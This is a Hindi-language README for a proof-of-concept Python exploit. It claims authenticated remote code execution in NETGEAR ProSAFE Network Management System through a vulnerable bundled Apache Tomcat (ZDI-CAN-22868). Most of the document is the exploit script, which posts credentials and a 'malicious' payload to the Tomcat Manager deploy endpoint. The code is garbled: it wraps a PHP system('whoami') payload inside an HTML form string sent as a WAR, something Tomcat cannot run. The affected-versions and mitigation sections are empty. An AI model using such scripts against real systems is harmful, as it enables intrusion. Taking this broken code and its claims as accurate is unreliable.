
NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में एक दुर्भावनापूर्ण वेब एप्लिकेशन तैनात करके कमजोर Apache Tomcat के माध्यम से प्रमाणित दूरस्थ कोड निष्पादन का प्रदर्शन करने वाली प्रूफ-ऑफ-कॉन्सेप्ट Python स्क्रिप्ट।
यहाँ NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में रिमोट कोड निष्पादन (RCE) भेद्यता के लिए एक संरचित README.md प्रस्तुत है:
इस रिपॉजिटरी में NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में एक रिमोट कोड निष्पादन (RCE) भेद्यता प्रदर्शित करने वाली एक प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट शामिल है। यह भेद्यता उत्पाद इंस्टॉलर के भीतर Apache Tomcat के एक कमजोर संस्करण के उपयोग के कारण है। यह समस्या प्रमाणित हमलावरों को प्रभावित इंस्टॉलेशन पर मनमाना कोड निष्पादित करने की अनुमति देती है।
CVE-ID: ZDI-CAN-22868
अवलोकन: NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में Apache Tomcat के एक कमजोर संस्करण के उपयोग के कारण रिमोट कोड निष्पादन भेद्यता है। एक प्रमाणित हमलावर इस भेद्यता का उपयोग करके प्रभावित सिस्टम पर SYSTEM के संदर्भ में मनमाना कोड निष्पादित कर सकता है।
प्रभावित संस्करण:
प्रमाणीकरण: आवश्यक
यह PoC दर्शाता है कि कैसे एक हमलावर रिमोट कोड निष्पादन प्राप्त करने के लिए भेद्यता का शोषण कर सकता है। विशिष्ट दोष उत्पाद इंस्टॉलर में निहित है, जो Apache Tomcat के पुराने या कमजोर संस्करण के उपयोग के कारण है।
निम्नलिखित स्क्रिप्ट दिखाती है कि इस RCE भेद्यता का शोषण कैसे करें। इस PoC को चलाने से पहले सुनिश्चित करें कि आपके पास उचित अनुमतियाँ हैं।
महत्वपूर्ण: यह PoC केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग अनधिकृत या दुर्भावनापूर्ण गतिविधियों के लिए नहीं किया जाना चाहिए।
import requests
# Configuration
target_url = "http://target-ip:port/manager/html" # Change this to the Tomcat Manager URL of the target
username = "admin" # Change to the valid username
password = "password" # Change to the valid password
# The payload to be executed on the remote server
payload = """
<?php
// Payload to execute arbitrary PHP code
system('whoami');
?>
"""
# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"
# Headers for authentication
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
def exploit_rce(url, username, password, payload):
"""
Exploit the RCE vulnerability by deploying a malicious web application.
Args:
url (str): The Tomcat Manager URL.
username (str): The Tomcat Manager username.
password (str): The Tomcat Manager password.
payload (str): The malicious payload to be executed.
"""
try:
# Create a new web application with the malicious payload
response = requests.post(
url,
headers=headers,
data={
"path": "/example",
"war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
},
auth=(username, password)
)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200 and "Deployed application" in response.text:
print("[+] Successfully deployed the malicious web application.")
else:
print("[-] Failed to deploy the malicious web application.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Exploiting RCE vulnerability at: {deploy_url}")
exploit_rce(deploy_url, username, password, payload)
target_url को लक्ष्य सिस्टम के Tomcat Manager URL पर सेट करें, और username और password को वैध क्रेडेंशियल्स से अपडेट करें।exploit_rce() फ़ंक्शन दुर्भावनापूर्ण वेब एप्लिकेशन को तैनात करने के लिए एक POST अनुरोध भेजता है।इस भेद्यता को कम करने के लिए, निम्नलिखित कदम उठाएँ:
इन चरणों का पालन करके, आप NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में RCE भेद्यता को संबोधित कर सकते हैं और समग्र सुरक्षा बढ़ा सकते हैं।
यह README.md RCE भेद्यता के लिए एक विस्तृत विवरण और PoC स्क्रिप्ट प्रदान करता है, जिसमें सेटअप निर्देश, विचार और शमन सलाह शामिल है।